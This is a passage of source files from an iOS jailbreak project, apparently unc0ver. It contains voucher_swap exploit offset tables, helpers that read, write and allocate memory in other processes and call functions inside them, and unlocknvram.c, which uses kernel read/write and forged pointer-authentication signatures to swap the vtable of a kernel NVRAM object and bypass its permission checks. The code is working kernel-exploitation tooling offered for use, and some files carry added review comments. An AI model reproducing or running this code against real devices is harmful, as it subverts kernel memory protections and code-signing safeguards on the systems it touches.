    // Gather platform info first; the matching below presumably compares against it.
    platform_init();
    // General system parameters: the number of matches is not needed.
    (void) run_initializations(system_parameters, ARRAY_COUNT(system_parameters));
    // Per-build offsets: too few matches means this device/build is not covered.
    size_t matched = run_initializations(offsets, ARRAY_COUNT(offsets));
    bool supported = (matched >= min_offsets);
    if (!supported) {
        ERROR("no offsets for %s %s", platform.machine, platform.osversion);
    }
    return supported;
}
209 |
--------------------------------------------------------------------------------
/Undecimus/source/parameters.h:
--------------------------------------------------------------------------------
1 | /*
2 | * parameters.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PARAMETERS_H_
6 | #define VOUCHER_SWAP__PARAMETERS_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | #ifdef PARAMETERS_EXTERN
13 | #define extern PARAMETERS_EXTERN
14 | #endif
15 |
16 | // Some helpful units.
17 | #define KB (1024uLL)
18 | #define MB (1024uLL * KB)
19 | #define GB (1024uLL * MB)
20 |
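// Generate the name for an offset.
#define OFFSET(base_, object_) _##base_##__##object_##__offset_

// Generate the name for the size of an object.
#define SIZE(object_) _##object_##__size_

// Generate the name for the size of a zalloc block of objects.
#define BLOCK_SIZE(object_) _##object_##__block_size_

// Generate the name for the number of elements in a zalloc block.
#define COUNT_PER_BLOCK(object_) _##object_##__per_block_

// Generate the name for the address of an object.
#define ADDRESS(object_) _##object_##__address_

// Generate the name for the static (unslid) address of an object.
#define STATIC_ADDRESS(object_) _##object_##__static_address_

// A convenience macro for accessing a field of a structure.
//
// object_ is parenthesized before the cast so that an expression argument such as `p + 1` is
// evaluated as a whole and only then treated as a byte pointer; without the parentheses the cast
// binds to `p` alone and the `+ 1` becomes a one-byte adjustment. The macro performs no bounds or
// alignment checking: the caller must make sure the buffer really holds type_ at that offset.
#define FIELD(object_, struct_, field_, type_) \
    ( *(type_ *) ( ((uint8_t *) (object_)) + OFFSET(struct_, field_) ) )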
42 |
43 | // The static base address of the kernel.
44 | extern uint64_t STATIC_ADDRESS(kernel_base);
45 |
46 | // The kernel_slide granularity.
47 | extern uint64_t kernel_slide_step;
48 |
49 | // Messages up to this size are allocated from the dedicated ipc.kmsgs zone.
50 | extern size_t message_size_for_kmsg_zone;
51 |
52 | // The size of elements in ipc.kmsgs.
53 | extern size_t kmsg_zone_size;
54 |
55 | // The maximum number of OOL ports in a single message.
56 | extern size_t max_ool_ports_per_message;
57 |
58 | // How much to allocate between sleeps while trying to trigger garbage collection.
59 | extern size_t gc_step;
60 |
61 | // Parameters for ipc_entry.
62 | extern size_t SIZE(ipc_entry);
63 | extern size_t OFFSET(ipc_entry, ie_object);
64 | extern size_t OFFSET(ipc_entry, ie_bits);
65 | extern size_t OFFSET(ipc_entry, ie_request);
66 |
67 | // Parameters for ipc_port.
68 | extern size_t SIZE(ipc_port);
69 | extern size_t BLOCK_SIZE(ipc_port);
70 | extern size_t COUNT_PER_BLOCK(ipc_port);
71 | extern size_t OFFSET(ipc_port, ip_bits);
72 | extern size_t OFFSET(ipc_port, ip_references);
73 | extern size_t OFFSET(ipc_port, waitq_flags);
74 | extern size_t OFFSET(ipc_port, imq_messages);
75 | extern size_t OFFSET(ipc_port, imq_msgcount);
76 | extern size_t OFFSET(ipc_port, imq_qlimit);
77 | extern size_t OFFSET(ipc_port, ip_receiver);
78 | extern size_t OFFSET(ipc_port, ip_kobject);
79 | extern size_t OFFSET(ipc_port, ip_nsrequest);
80 | extern size_t OFFSET(ipc_port, ip_requests);
81 | extern size_t OFFSET(ipc_port, ip_mscount);
82 | extern size_t OFFSET(ipc_port, ip_srights);
83 |
84 | // Parameters for ipc_port_request.
85 | extern size_t SIZE(ipc_port_request);
86 | extern size_t OFFSET(ipc_port_request, ipr_soright);
87 |
88 | // Parameters for struct ipc_space.
89 | extern size_t OFFSET(ipc_space, is_table_size);
90 | extern size_t OFFSET(ipc_space, is_table);
91 |
92 | // Parameters for ipc_voucher.
93 | extern size_t SIZE(ipc_voucher);
94 | extern size_t BLOCK_SIZE(ipc_voucher);
95 | extern size_t COUNT_PER_BLOCK(ipc_voucher);
96 |
97 | // Parameters for struct proc.
98 | extern size_t OFFSET(proc, p_pid);
99 | extern size_t OFFSET(proc, p_ucred);
100 |
101 | // Parameters for struct sysctl_oid.
102 | extern size_t SIZE(sysctl_oid);
103 | extern size_t OFFSET(sysctl_oid, oid_parent);
104 | extern size_t OFFSET(sysctl_oid, oid_link);
105 | extern size_t OFFSET(sysctl_oid, oid_kind);
106 | extern size_t OFFSET(sysctl_oid, oid_handler);
107 | extern size_t OFFSET(sysctl_oid, oid_version);
108 | extern size_t OFFSET(sysctl_oid, oid_refcnt);
109 |
110 | // Parameters for struct task.
111 | extern size_t OFFSET(task, lck_mtx_type);
112 | extern size_t OFFSET(task, ref_count);
113 | extern size_t OFFSET(task, active);
114 | extern size_t OFFSET(task, map);
115 | extern size_t OFFSET(task, itk_space);
116 | extern size_t OFFSET(task, bsd_info);
117 |
118 | /*
119 | * parameters_init
120 | *
121 | * Description:
122 | * Initialize the parameters for the system.
123 | */
124 | bool parameters_init(void);
125 |
126 | #undef extern
127 |
128 | #endif
129 |
--------------------------------------------------------------------------------
/Undecimus/source/platform.c:
--------------------------------------------------------------------------------
1 | /*
2 | * platform.c
3 | * Brandon Azad
4 | */
5 | #define PLATFORM_EXTERN
6 | #include "platform.h"
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "log.h"
14 |
15 | // ---- Initialization ----------------------------------------------------------------------------
16 |
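// Fill in the global platform description (page size, machine name, OS build, CPU and memory
// info) once; later calls return immediately.
//
// NOTE(review): every failure check below is an assert(), so a build with NDEBUG defined would
// ignore a failing uname(), sysctlbyname() or host_info() and continue with partial data.
// NOTE(review): platform.machine and platform.osversion are declared const in platform.h and are
// written here through casts; modifying a const-qualified object is undefined behavior in C, so
// the declaration and this code should be reconciled.
void
platform_init() {
    // Only initialize once.
    static bool initialized = false;
    if (initialized) {
        return;
    }
    initialized = true;
    // Set the page size.
    platform.page_size = vm_kernel_page_size;
    page_size = platform.page_size;
    // Get the machine name (e.g. iPhone11,8).
    struct utsname u = {};
    int error = uname(&u);
    assert(error == 0);
    // strncpy() does not NUL-terminate when the source fills the destination, and the field is
    // later printed with %s, so copy one byte less than the field size and terminate explicitly.
    char *machine = (char *)platform.machine;
    strncpy(machine, u.machine, sizeof(platform.machine) - 1);
    machine[sizeof(platform.machine) - 1] = '\0';
    // Get the build (e.g. 16C50).
    char *osversion = (char *)platform.osversion;
    size_t osversion_size = sizeof(platform.osversion);
    error = sysctlbyname("kern.osversion",
            (void *)osversion, &osversion_size, NULL, 0);
    assert(error == 0);
    // Keep the field terminated even if the call above failed and the assert is compiled out.
    osversion[sizeof(platform.osversion) - 1] = '\0';
    // Get basic host info.
    mach_port_t host = mach_host_self();
    assert(MACH_PORT_VALID(host));
    host_basic_info_data_t basic_info;
    mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT;
    kern_return_t kr = host_info(host, HOST_BASIC_INFO, (host_info_t) &basic_info, &count);
    assert(kr == KERN_SUCCESS);
    platform.cpu_type = basic_info.cpu_type;
    platform.cpu_subtype = basic_info.cpu_subtype;
    platform.physical_cpu = basic_info.physical_cpu;
    platform.logical_cpu = basic_info.logical_cpu;
    platform.memory_size = basic_info.max_mem;
    INFO("memory_size: %zu", platform.memory_size);
    // Drop the host port reference obtained from mach_host_self().
    mach_port_deallocate(mach_task_self(), host);
    // Log basic platform info.
    DEBUG_TRACE(1, "platform: %s %s", platform.machine, platform.osversion);
}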
55 |
--------------------------------------------------------------------------------
/Undecimus/source/platform.h:
--------------------------------------------------------------------------------
1 | /*
2 | * platform.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PLATFORM_H_
6 | #define VOUCHER_SWAP__PLATFORM_H_
7 |
8 | #include
9 | #include
10 |
11 | #ifdef PLATFORM_EXTERN
12 | #define extern PLATFORM_EXTERN
13 | #endif
14 |
15 | /*
16 | * platform
17 | *
18 | * Description:
19 | * Basic information about the platform.
20 | */
21 | struct platform {
22 | /*
23 | * platform.machine
24 | *
25 | * Description:
26 | * The name of the platform, e.g. iPhone11,8.
27 | */
28 | const char machine[32];
29 | /*
30 | * platform.osversion
31 | *
32 | * Description:
33 | * The version of the OS build, e.g. 16C50.
34 | */
35 | const char osversion[32];
36 | /*
37 | * platform.cpu_type
38 | *
39 | * Description:
40 | * The platform CPU type.
41 | */
42 | cpu_type_t cpu_type;
43 | /*
44 | * platform.cpu_subtype
45 | *
46 | * Description:
47 | * The platform CPU subtype.
48 | */
49 | cpu_subtype_t cpu_subtype;
50 | /*
51 | * platform.physical_cpu
52 | *
53 | * Description:
54 | * The number of physical CPU cores.
55 | */
56 | unsigned physical_cpu;
57 | /*
58 | * platform.logical_cpu
59 | *
60 | * Description:
61 | * The number of logical CPU cores.
62 | */
63 | unsigned logical_cpu;
64 | /*
65 | * platform.page_size
66 | *
67 | * Description:
68 | * The kernel page size.
69 | */
70 | size_t page_size;
71 | /*
72 | * platform.memory_size
73 | *
74 | * Description:
75 | * The size of physical memory on the device.
76 | */
77 | size_t memory_size;
78 | };
79 | extern struct platform platform;
80 |
81 | /*
82 | * page_size
83 | *
84 | * Description:
85 | * The kernel page size on this platform, made available globally for convenience.
86 | */
87 | extern size_t page_size;
88 |
89 | /*
90 | * platform_init
91 | *
92 | * Description:
93 | * Initialize the platform.
94 | */
95 | void platform_init(void);
96 |
97 | #undef extern
98 |
99 | #endif
100 |
--------------------------------------------------------------------------------
/Undecimus/source/platform_match.h:
--------------------------------------------------------------------------------
1 | /*
2 | * platform_match.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__PLATFORM_MATCH_H_
6 | #define VOUCHER_SWAP__PLATFORM_MATCH_H_
7 |
8 | #include
9 |
10 | /*
11 | * platform_matches_device
12 | *
13 | * Description:
14 | * Check whether the current platform matches the specified device or range of devices.
15 | *
16 | * Match format:
17 | * The match string may either specify a single device glob or a range of device globs. For
18 | * example:
19 | *
20 | * "iPhone11,8" Matches only iPhone11,8
21 | * "iPhone11,*" Matches all iPhone11 devices, including e.g. iPhone11,4.
22 | * "iPhone*,*" Matches all iPhone devices.
23 | * "iPhone11,4-iPhone11,8" Matches all iPhone devices between 11,4 and 11,8, inclusive.
24 | * "iPhone10,*-11,*" Matches all iPhone10 and iPhone11 devices.
25 | *
26 | * As a special case, "*" matches all devices.
27 | */
28 | bool platform_matches_device(const char *device_range);
29 |
30 | /*
31 | * platform_matches_build
32 | *
33 | * Description:
34 | * Check whether the current platform matches the specified build version or range of build
35 | * versions.
36 | *
37 | * Match format:
38 | * The match string may either specify a single build version or a range of build versions.
39 | * For example:
40 | *
41 | * "16C50" Matches only build 16C50.
42 | * "16B92-16C50" Matches all builds between 16B92 and 16C50, inclusive.
43 | *
44 | * As a special case, either build version may be replaced with "*" to indicate a lack of
45 | * lower or upper bound:
46 | *
47 | * "*-16B92" Matches all builds up to and including 16B92.
48 | * "16C50-*" Matches build 16C50 and later.
49 | * "*" Matches all build versions.
50 | */
51 | bool platform_matches_build(const char *build_range);
52 |
53 | /*
54 | * platform_matches
55 | *
56 | * Description:
57 | * A convenience function that combines platform_matches_device() and
58 | * platform_matches_build().
59 | */
60 | bool platform_matches(const char *device_range, const char *build_range);
61 |
62 | #endif
63 |
--------------------------------------------------------------------------------
/Undecimus/source/prefs.h:
--------------------------------------------------------------------------------
1 | //
2 | // prefs.h
3 | // Undecimus
4 | //
5 | // Created by Pwn20wnd on 5/3/19.
6 | // Copyright © 2019 Pwn20wnd. All rights reserved.
7 | //
8 |
9 | #ifndef prefs_h
10 | #define prefs_h
11 |
12 | #include
13 | #include
14 |
15 | #define K_TWEAK_INJECTION "TweakInjection"
16 | #define K_LOAD_DAEMONS "LoadDaemons"
17 | #define K_DUMP_APTICKET "DumpAPTicket"
18 | #define K_REFRESH_ICON_CACHE "RefreshIconCache"
19 | #define K_BOOT_NONCE "BootNonce"
20 | #define K_EXPLOIT "Exploit"
21 | #define K_DISABLE_AUTO_UPDATES "DisableAutoUpdates"
22 | #define K_DISABLE_APP_REVOKES "DisableAppRevokes"
23 | #define K_OVERWRITE_BOOT_NONCE "OverwriteBootNonce"
24 | #define K_EXPORT_KERNEL_TASK_PORT "ExportKernelTaskPort"
25 | #define K_RESTORE_ROOTFS "RestoreRootFS"
26 | #define K_INCREASE_MEMORY_LIMIT "IncreaseMemoryLimit"
27 | #define K_ECID "Ecid"
28 | #define K_INSTALL_OPENSSH "InstallOpenSSH"
29 | #define K_INSTALL_CYDIA "InstallCydia"
30 | #define K_RELOAD_SYSTEM_DAEMONS "DoReloadSystemDaemons"
31 | #define K_HIDE_LOG_WINDOW "HideLogWindow"
32 | #define K_RESET_CYDIA_CACHE "ResetCydiaCache"
33 | #define K_SSH_ONLY "SSHOnly"
34 | #define K_ENABLE_GET_TASK_ALLOW "DoEnableGetTaskAllow"
35 | #define K_SET_CS_DEBUGGED "SetCSDebugged"
36 | #define K_INSTALL_SILEO "InstallSileo"
37 | #define K_THEME "Theme"
38 | #define K_REINSTALL_SILEO_SWITCH "HideSileoSwitch"
39 | #define K_AUTO_RESPRING "AutoRespring"
40 | #define K_HIDE_PROGRESS_HUD "HideProgressHUD"
41 |
42 | #define K_BACKGROUND_COLOR "Background Color"
43 | #define K_U0_COLOR "Unc0ver Logo Color"
44 | #define K_FAKE_BUTTON_COLOR "Fake Button Color"
45 | #define K_FAKE_TINT_COLOR "Fake Button Tint Color"
46 | #define K_FAKE_TEXT_COLOR "Fake Button Text Color"
47 | #define K_GO_TEXT_COLOR "Go Button Text Color"
48 | #define K_OUTPUT_COLOR "Output View Color"
49 | #define K_OUTPUT_TEXT_COLOR "Output View Text Color"
50 | #define K_PICKER_TINT_COLOR "Exploit Picker Tint Color"
51 | #define K_TINT_COLOR "Tint Color"
52 | #define K_TEXT_COLOR "Text Color"
53 | #define K_DARK_TEXT_COLOR "Dark Text Color"
54 | #define K_LINK_COLOR "Link Color"
55 | #define K_DARK_STATUS_BAR "Light Status Bar Content"
56 |
// In-memory copy of the application's preferences.
//
// Most field names parallel the K_* preference keys defined above; presumably load_prefs() fills
// each field from the corresponding key — confirm in the implementation, which is not part of
// this header.
typedef struct {
    bool load_tweaks;
    bool load_daemons;
    bool dump_apticket;
    bool run_uicache;
    // NOTE(review): ownership of this string is not visible here; presumably release_prefs()
    // frees it — verify before storing a string literal or a borrowed pointer.
    const char *boot_nonce;
    bool disable_auto_updates;
    bool disable_app_revokes;
    bool overwrite_boot_nonce;
    bool export_kernel_task_port;
    bool restore_rootfs;
    bool increase_memory_limit;
    // NOTE(review): same ownership question as boot_nonce.
    const char *ecid;
    bool install_cydia;
    bool install_sileo;
    bool install_openssh;
    bool reload_system_daemons;
    bool reset_cydia_cache;
    bool ssh_only;
    bool enable_get_task_allow;
    bool set_cs_debugged;
    bool hide_log_window;
    bool uicache_sileo;
    bool uicache_cydia;
    int theme;
    bool reinstall_sileo_switch;
    bool auto_respring;
    bool hide_progress_hud;
    // Presumably one of the exploit enum values declared in utils.h — TODO confirm.
    int exploit;

    // Theme colors, stored as int; the encoding is not visible in this header.
    int backgroundColor;
    int u0Color;
    int fakeButtonColor;
    int fakeTintColor;
    int fakeTextColor;
    int goTextColor;
    int outputColor;
    int outputTextColor;
    int pickerTintColor;
    int tintColor;
    int textColor;
    int darkTextColor;
    int linkColor;
    bool darkStatusBar;
} prefs_t;
102 |
103 | prefs_t *new_prefs(void);
104 | prefs_t *copy_prefs(void);
105 | void release_prefs(prefs_t **prefs);
106 | bool load_prefs(prefs_t *prefs);
107 | bool set_prefs(prefs_t *prefs);
108 | void register_default_prefs(void);
109 | void repair_prefs(void);
110 | void reset_prefs(void);
111 |
112 | #endif /* prefs_h */
113 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_call.h:
--------------------------------------------------------------------------------
1 | #ifndef remote_call_h
2 | #define remote_call_h
3 |
4 | #include
5 | #include
6 |
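// Kinds of argument that an arg_desc can describe.
enum arg_type {
    ARG_LITERAL,
    ARG_BUFFER,
    ARG_BUFFER_PERSISTENT, // don't free the buffer after the call
    ARG_OUT_BUFFER
};

// One argument for call_remote() / thread_call_remote(): its kind (an enum arg_type value), the
// literal value or local pointer, and the buffer length in bytes (0 for literals).
typedef struct _arg_desc {
    uint64_t type;
    uint64_t value;
    uint64_t length;
} arg_desc;

// Each macro below yields the address of a compound-literal arg_desc, which lives only until the
// end of the enclosing block, so use the result directly as a call argument.
// Macro parameters are parenthesized before the cast so that an expression argument such as
// `ptr + 1` is evaluated as a whole; without the parentheses the cast binds to `ptr` alone.
// The CSTRING variants evaluate str twice and trust it to be NUL-terminated.
#define REMOTE_LITERAL(val) \
    &(arg_desc) { ARG_LITERAL, (uint64_t)(val), (uint64_t)0 }
#define REMOTE_BUFFER(ptr, size) \
    &(arg_desc) { ARG_BUFFER, (uint64_t)(ptr), (uint64_t)(size) }
#define REMOTE_CSTRING(str) \
    &(arg_desc) { ARG_BUFFER, (uint64_t)(str), (uint64_t)(strlen(str) + 1) }
#define REMOTE_BUFFER_PERSISTENT(ptr, size) \
    &(arg_desc) { ARG_BUFFER_PERSISTENT, (uint64_t)(ptr), (uint64_t)(size) }
#define REMOTE_CSTRING_PERSISTENT(str) \
    &(arg_desc) { ARG_BUFFER_PERSISTENT, (uint64_t)(str), (uint64_t)(strlen(str) + 1) }

// allocate a remote buffer and pass the address of that to the remote function
// when the function call is complete return the contents of that buffer to this process
// and deallocate the buffer in the remote process
// ptr should be a pointer to a buffer capable of holding size bytes
//
// eg:
// mach_port_t port = MACH_PORT_NULL;
// call_remote(task_port, bootstrap_look_up, 3, REMOTE_LITERAL(remote_bootstrap_port), REMOTE_CSTRING("com.foo.bar"), REMOTE_OUT_BUFFER(&port, sizeof(port)));
// // port set to value of looked up port in remote process
// // note that this doesn't actually transfer the port! use other helpers for that
#define REMOTE_OUT_BUFFER(ptr, size) \
    &(arg_desc) { ARG_OUT_BUFFER, (uint64_t)(ptr), (uint64_t)(size) }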
43 |
44 | uint64_t call_remote(mach_port_t task_port, void* fptr, int n_params, ...);
45 | uint64_t thread_call_remote(mach_port_t thread_port, void* fptr, int n_params, ...);
46 |
47 | #endif
48 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_memory.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "remote_memory.h"
14 |
15 | #include
16 |
17 | // no headers for these in iOS SDK:
18 | extern kern_return_t mach_vm_allocate(
19 | vm_map_t target,
20 | mach_vm_address_t* address,
21 | mach_vm_size_t size,
22 | int flags);
23 |
24 | extern kern_return_t mach_vm_deallocate(
25 | vm_map_t target,
26 | mach_vm_address_t address,
27 | mach_vm_size_t size);
28 |
29 | extern kern_return_t mach_vm_read_overwrite(
30 | vm_map_t target_task,
31 | mach_vm_address_t address,
32 | mach_vm_size_t size,
33 | mach_vm_address_t data,
34 | mach_vm_size_t* outsize);
35 |
36 | extern kern_return_t mach_vm_write(
37 | vm_map_t target_task,
38 | mach_vm_address_t address,
39 | vm_offset_t data,
40 | mach_msg_type_number_t dataCnt);
41 |
// Allocate size bytes in the task identified by task_port.
// Returns the address of the allocation in that task, or 0 (after logging) when
// mach_vm_allocate() does not return KERN_SUCCESS.
uint64_t
remote_alloc(mach_port_t task_port,
    uint64_t size)
{
    mach_vm_offset_t allocated = 0;
    // Flags value 1 is ANYWHERE: the kernel chooses the address.
    kern_return_t kr = mach_vm_allocate(task_port, &allocated, (mach_vm_size_t)size, 1);
    if (kr == KERN_SUCCESS) {
        return (uint64_t)allocated;
    }
    LOG("unable to allocate buffer in remote process");
    return 0;
}
57 |
// Deallocate size bytes at base in the task identified by task_port.
// A failure is logged only; the caller gets no indication of it.
void remote_free(mach_port_t task_port,
    uint64_t base,
    uint64_t size)
{
    kern_return_t kr = mach_vm_deallocate(task_port, (mach_vm_address_t)base, (mach_vm_size_t)size);
    if (kr != KERN_SUCCESS) {
        LOG("unabble to deallocate remote buffer");
    }
}
71 |
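// Allocate length bytes in the task identified by task_port and copy length bytes from
// local_address into the new allocation.
// Returns the remote address, or 0 when the length does not fit the write call, the allocation
// fails, or the write fails. On a failed write the remote allocation is released again instead of
// being leaked.
uint64_t
alloc_and_fill_remote_buffer(mach_port_t task_port,
    uint64_t local_address,
    uint64_t length)
{
    kern_return_t err;

    // mach_vm_write() takes a mach_msg_type_number_t count; refuse a length that the cast below
    // would silently truncate, which would leave part of the buffer unwritten.
    if ((uint64_t)(mach_msg_type_number_t)length != length) {
        LOG("remote buffer length does not fit mach_vm_write");
        return 0;
    }

    uint64_t remote_address = remote_alloc(task_port, length);
    if (remote_address == 0) {
        // remote_alloc() has already logged the failure; do not write to address 0.
        return 0;
    }

    err = mach_vm_write(task_port, remote_address, (mach_vm_offset_t)local_address, (mach_msg_type_number_t)length);
    if (err != KERN_SUCCESS) {
        LOG("unable to write to remote memory");
        remote_free(task_port, remote_address, length);
        return 0;
    }

    return remote_address;
}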
89 |
// Copy length bytes from remote_address in the task identified by task_port into the local
// buffer at local_address, which must be able to hold length bytes.
// A failed or short read is logged only; the function returns void, so the caller cannot tell
// whether the local buffer was filled.
void remote_read_overwrite(mach_port_t task_port,
    uint64_t remote_address,
    uint64_t local_address,
    uint64_t length)
{
    mach_vm_size_t copied = 0;
    kern_return_t kr = mach_vm_read_overwrite(task_port, (mach_vm_address_t)remote_address, (mach_vm_size_t)length, (mach_vm_address_t)local_address, &copied);
    if (kr != KERN_SUCCESS) {
        LOG("remote read failed");
    } else if (copied != length) {
        LOG("remote read was short (expected %llx, got %llx", length, copied);
    }
}
109 |
// Copy length bytes from local_address into remote_address in the task identified by
// remote_task_port. The length is cast to mach_msg_type_number_t for the call.
// A failure is logged with its Mach error string and code; nothing is returned to the caller.
void remote_write(mach_port_t remote_task_port,
    uint64_t remote_address,
    uint64_t local_address,
    uint64_t length)
{
    mach_vm_address_t destination = (mach_vm_address_t)remote_address;
    vm_offset_t source = (vm_offset_t)local_address;
    mach_msg_type_number_t byte_count = (mach_msg_type_number_t)length;

    kern_return_t kr = mach_vm_write(remote_task_port, destination, source, byte_count);
    if (kr != KERN_SUCCESS) {
        LOG("remote write failed: %s %x", mach_error_string(kr), kr);
    }
}
124 |
--------------------------------------------------------------------------------
/Undecimus/source/remote_memory.h:
--------------------------------------------------------------------------------
1 | #ifndef remote_memory_h
2 | #define remote_memory_h
3 |
4 | #include
5 | #include
6 |
7 | // allocate a buffer in the remote process
8 | uint64_t
9 | remote_alloc(mach_port_t task_port,
10 | uint64_t size);
11 |
12 | // free a buffer in the remote process
13 | void remote_free(mach_port_t task_port,
14 | uint64_t base,
15 | uint64_t size);
16 |
17 | // allocate a buffer in the remote process and fill it with the given contents
18 | uint64_t
19 | alloc_and_fill_remote_buffer(mach_port_t task_port,
20 | uint64_t local_address,
21 | uint64_t length);
22 |
23 | // read from the remote address to the local address
24 | // local address must be the address of a buffer at least length bytes in size
25 | void remote_read_overwrite(mach_port_t task_port,
26 | uint64_t remote_address,
27 | uint64_t local_address,
28 | uint64_t length);
29 |
// write length bytes from the local address to the remote address
// a failure is logged by the implementation and is not reported to the caller
void remote_write(mach_port_t remote_task_port,
    uint64_t remote_address,
    uint64_t local_address,
    uint64_t length);
34 |
35 | #endif /* remote_memory_h */
36 |
--------------------------------------------------------------------------------
/Undecimus/source/unlocknvram.c:
--------------------------------------------------------------------------------
1 | // iOS 11 moves OFVariables to const
2 | // https://twitter.com/s1guza/status/908790514178301952
3 | // however, if we:
4 | // 1) Can find IODTNVRAM service
5 | // 2) Have tfp0 / kernel read|write|alloc
6 | // 3) Can leak kernel address of mach port
7 | // then we can fake vtable on IODTNVRAM object
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include "KernelUtilities.h"
14 | #include "KernelOffsets.h"
15 | #include "KernelMemory.h"
16 | #include "find_port.h"
17 | #include "pac.h"
18 | #include "kernel_call.h"
19 | #include "kc_parameters.h"
20 |
21 | static const size_t max_vtable_size = 0x1000;
22 | static const size_t kernel_buffer_size = 0x4000;
23 |
24 | // it always returns false
25 | static const uint64_t searchNVRAMProperty = 0x590;
26 | // 0 corresponds to root only
27 | static const uint64_t getOFVariablePerm = 0x558;
28 |
29 | // convertPropToObject calls getOFVariableType
30 | // open convertPropToObject, look for first vtable call -- that'd be getOFVariableType
31 | // find xrefs, figure out vtable start from that
32 | // following are offsets of entries in vtable
33 |
// get kernel address of IODTNVRAM object
// a non-zero result is kept in a function-local static and returned directly on later calls;
// returns 0 when the IODTNVRAM service cannot be found
uint64_t get_iodtnvram_obj(void) {
    static uint64_t cached_obj = 0;

    if (cached_obj != 0) {
        return cached_obj;
    }

    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IODTNVRAM"));
    if (!MACH_PORT_VALID(service)) {
        LOG("Failed to get IODTNVRAM service");
        return 0;
    }

    uint64_t port_address = get_address_of_port(proc_struct_addr(), service);
    cached_obj = ReadKernel64(port_address + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    LOG("IODTNVRAM obj at 0x%llx", cached_obj);

    return cached_obj;
}
52 |
53 | uint64_t orig_vtable = 0;
54 | uint64_t fake_vtable = 0;
55 | uint64_t fake_vtable_xpac = 0;
56 |
// Replace the vtable pointer of the IODTNVRAM object with a modified copy built here.
//
// Returns 0 after the replacement, or 1 when get_iodtnvram_obj() fails. The original pointer is
// kept in orig_vtable and the kernel allocation in fake_vtable_xpac so that locknvram() can undo
// the change.
//
// NOTE(review): the results of calloc(), IOMalloc(), kread() and kwrite() are not checked, so a
// failed allocation or transfer is not detected before the kernel object is modified.
// NOTE(review): calling this twice without locknvram() in between overwrites orig_vtable with the
// already-replaced pointer and drops the first kernel buffer, after which locknvram() can no
// longer restore the original state — looks unintended; confirm against the callers.
int unlocknvram(void) {
    uint64_t obj = get_iodtnvram_obj();
    if (obj == 0) {
        LOG("get_iodtnvram_obj failed!");
        return 1;
    }

    // Remember the original pointer for locknvram().
    orig_vtable = ReadKernel64(obj);
    uint64_t vtable_xpac = kernel_xpacd(orig_vtable);

    // Local working copy; max_vtable_size bytes are read regardless of the real table length.
    uint64_t *buf = calloc(1, max_vtable_size);
    kread(vtable_xpac, buf, max_vtable_size);

    // alter it
    buf[getOFVariablePerm / sizeof(uint64_t)] = \
        kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);

    // allocate buffer in kernel
    // (kernel_buffer_size is larger than max_vtable_size, so the copy below fits)
    fake_vtable_xpac = IOMalloc(kernel_buffer_size);

    // Forge the pacia pointers to the virtual methods.
    // The loop stops at the first zero entry; count ends up as the number of entries to copy.
    size_t count = 0;
    for (; count < max_vtable_size / sizeof(*buf); count++) {
        uint64_t vmethod = buf[count];
        if (vmethod == 0) {
            break;
        }
#if __arm64e__
        assert(count < VTABLE_PAC_CODES(IODTNVRAM).count);
        vmethod = kernel_xpaci(vmethod);
        uint64_t vmethod_address = fake_vtable_xpac + count * sizeof(*buf);
        buf[count] = kernel_forge_pacia_with_type(vmethod, vmethod_address,
                VTABLE_PAC_CODES(IODTNVRAM).codes[count]);
#endif // __arm64e__
    }

    // and copy it back
    kwrite(fake_vtable_xpac, buf, count*sizeof(*buf));
#if __arm64e__
    fake_vtable = kernel_forge_pacda(fake_vtable_xpac, 0);
#else
    fake_vtable = fake_vtable_xpac;
#endif

    // replace vtable on IODTNVRAM object
    WriteKernel64(obj, fake_vtable);

    // Release the local working copy; the kernel buffer stays allocated until locknvram().
    SafeFreeNULL(buf);
    LOG("Unlocked nvram");
    return 0;
}
108 |
// Undo unlocknvram(): write the saved original vtable pointer back to the IODTNVRAM object and
// free the kernel buffer that held the modified copy.
//
// Returns 0 on success, -1 when no saved state exists (orig_vtable or fake_vtable_xpac is 0), and
// 1 when get_iodtnvram_obj() fails.
//
// NOTE(review): orig_vtable is not reset here; whether a second call is rejected depends on
// SafeIOFreeNULL() clearing fake_vtable_xpac, which its name suggests — confirm in its definition.
int locknvram(void) {
    if (orig_vtable == 0 || fake_vtable_xpac == 0) {
        LOG("Trying to lock nvram, but didnt unlock first");
        return -1;
    }

    uint64_t obj = get_iodtnvram_obj();
    if (obj == 0) { // would never happen but meh
        LOG("get_iodtnvram_obj failed!");
        return 1;
    }

    // Restore the pointer first, then free the buffer the object no longer refers to.
    WriteKernel64(obj, orig_vtable);
    SafeIOFreeNULL(fake_vtable_xpac, kernel_buffer_size);

    LOG("Locked nvram");
    return 0;
}
127 |
--------------------------------------------------------------------------------
/Undecimus/source/unlocknvram.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | int unlocknvram(void);
4 | int locknvram(void);
5 |
6 |
--------------------------------------------------------------------------------
/Undecimus/source/user_client.h:
--------------------------------------------------------------------------------
1 | /*
2 | * kernel_call/user_client.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
6 | #define VOUCHER_SWAP__KERNEL_CALL__USER_CLIENT_H_
7 |
8 | #include
9 | #include
10 | #include
11 |
12 | /*
13 | * stage1_kernel_call_init
14 | *
15 | * Description:
16 | * Initialize stage 1 of kernel function calling.
17 | *
18 | * Initializes:
19 | * kernel_call_parameters_init()
20 | * stage1_kernel_call_7v()
21 | */
22 | bool stage1_kernel_call_init(void);
23 |
24 | /*
25 | * stage1_kernel_call_deinit
26 | *
27 | * Description:
28 | * Deinitialize stage 1 of kernel function calling.
29 | */
30 | void stage1_kernel_call_deinit(void);
31 |
32 | /*
33 | * stage1_get_kernel_buffer
34 | *
